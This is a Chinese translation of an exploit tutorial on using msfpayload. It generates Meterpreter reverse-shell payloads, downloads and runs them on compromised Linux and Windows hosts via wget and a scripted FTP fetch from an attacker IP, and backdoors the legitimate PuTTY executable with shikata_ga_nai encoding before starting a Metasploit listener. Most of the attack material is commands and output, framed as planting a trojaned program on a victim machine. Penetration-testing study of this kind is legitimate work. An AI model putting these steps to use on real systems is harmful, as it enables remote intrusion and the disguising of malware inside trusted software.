漏洞利用教程:msfpayload 和 Backdooring EXEs
此版本的PrimalSec漏洞教程系列将介绍如何使用msfpayload创建各种有效负载。msfpayload是Metasploit框架的一部分,允许我们生成各种格式的Metasploit有效负载。在我们之前的博文中,我们利用msfpayload生成原始shellcode,我们在缓冲区溢出中利用它来执行代码。
现在我们将讨论msfpayload的一些其他用例,以生成一些meterpreter有效负载。你经常会发现自己想要将原始shell升级到meterpreter shell,因为你有很多增加的功能,或者你可能希望为持久性提供合法的可执行文件。
创建Meterpeter有效负载以升级原始shell:
# Windows Meterpreter 反弹 shell:
msfpayload windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > win_meter.exe
# Linux x86 Meterpreter 反弹 Shell:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > lin_meter.exe
# PHP Meterpreter 反弹 Shell:
msfpayload php/meterpreter_reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> R > php_meter.php
在Linux上下载二进制文件
要将原始shell升级到meterpreter,可以按照Linux的以下过程进行操作:
可选:使用Python生成伪终端
要创建python HTTP服务器,可以利用内置函数“SimpleHTTPServer”。你可以使用开关“-m”直接从命令行调用模块。默认情况下,侦听器将从端口8000开始,但你可以指定要用作参数的端口:
python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 80 ...
现在假设你没有防火墙阻止连接,你应该能够向服务器发出请求。你可以把在你开始Python的HTTP服务器的同一目录中Meterpreter就会二进制文件,它应该是远程客户端访问。以下是你可能希望如何利用wget的示例。我发现在你没有权限在当前工作目录中写入的初始Web shell并且你无法更改目录的情况下,这种情况很常见。因此,要解决此问题,你可以执行以下操作:
# 参数 -O 允许你输出到另一个目录 /tmp/通常是可写的
wget -O /tmp/<meterpeter_binary> http://<attacker_ip>/<meterpeter_binary>
# 更改权限
chmod a+x /tmp/<meterpeter_binary>
# 总是一个好主意,以确保文件正确
file /tmp/<meterpeter_binary>
# 运行meterpreter二进制文件
/tmp/<meterpeter_binary>
在Windows上下载二进制文件
要升级你的原始外壳Meterpreter就会在Windows中可以做一些CLI功夫。这可以帮助你避开与原壳的问题,而不是处理需要额外的输入一定的命令:
# 你可以逐行建立FTP脚本
# 不要使用用户名/密码,因为它们会弄乱身份验证
C:>echo open [attacker_ip] >> ftp.txt
C:>echo [user]>>ftp.txt
C:>echo [password]>>ftp.txt
C:>echo get [meterpreter_binary]>>ftp.txt
C:>echo bye >> ftp.txt
现在,你可以使用带有参数“-s”的内置Windows FTP客户端,并使用你创建的FTP脚本文件:
c:>ftp -s:ftp.txt
ftp.exe -s:ftp.txt
User ([attacker_ip]:(none)): open [attacker_ip]
get [meterpreter_binary]
bye
c:> dir /s | findstr [meterpreter_binary]
现在,如果你想利用msfpayload后门合法二进制文件,你可以执行以下操作:
~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=443 R | msfencode -t exe -x /tmp/putty.exe -k -o putty_bad.exe -e x86/shikata_ga_nai -c 3
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)
在这个例子中,我们决定后门PuTTY,但可能是任何二进制文件。参数“-t”指定输出格式,“ - x”指定要使用的备用可执行模板,参数“ - o”指定输出文件,参数“-e”是编码使用。现在我们可以在受害者计算机上植入后门可执行文件,启动一个监听器并测试它:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.102:443
[*] Starting the payload handler...
现在假设一切正常,当你点击受害者机器上的PuTTY二进制文件时,你会看到你的Meterpreter会话产生:
作者:primalsecurity
责任编辑:F0rmat
翻译来源:http://www.primalsecurity.net/0x6-exploit-tutorial-msfpayload-and-backdooring-exes/